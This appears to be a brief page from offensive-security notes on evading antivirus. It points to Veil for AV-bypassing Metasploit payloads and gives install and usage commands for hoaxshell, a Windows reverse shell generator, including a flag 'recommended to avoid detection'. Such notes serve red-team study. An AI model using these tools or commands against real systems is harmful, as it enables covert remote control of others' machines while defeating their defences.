Antivirus

Obfuscated payloads

Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions.
Check these

HoaxShell

hoaxshell is a Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell.

# install
git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py

# usage 
# recommended to avoid detection
python3 hoaxshell.py -s <your_ip> -i -H "Authorization"

Last updated

Was this helpful?